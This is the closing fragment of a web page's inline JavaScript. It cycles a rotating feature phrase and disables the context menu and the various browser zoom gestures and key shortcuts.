            const el = document.getElementById('rotatingFeature');
            if (!el) return;
            setInterval(() => {
            idx = (idx + 1) % phrases.length;
            el.textContent = phrases[idx];
            }, 2000);
        })();
        
        document.addEventListener('contextmenu', function (e) {
        e.preventDefault();
        });

        document.addEventListener('touchstart', function(e) {
            if (e.touches.length > 1) {
                e.preventDefault();
            }
        });

        document.addEventListener('gesturestart', function(e) {
            e.preventDefault();
        });

        document.addEventListener('gesturechange', function(e) {
            e.preventDefault();
        });

        document.addEventListener('gestureend', function(e) {
            e.preventDefault();
        });

        let lastTouchEnd = 0;
        document.addEventListener('touchend', function(e) {
            const now = (new Date()).getTime();
            if (now - lastTouchEnd <= 300) {
                e.preventDefault();
            }
            lastTouchEnd = now;
        }, false);

        document.addEventListener('keydown', function(e) {
            if (e.ctrlKey && (e.key === '+' || e.key === '-' || e.key === '=')) {
                e.preventDefault();
            }
        });

        document.addEventListener('wheel', function(e) {
            if (e.ctrlKey) {
                e.preventDefault();
            }
        }, { passive: false });
    </script>
</body>
</html>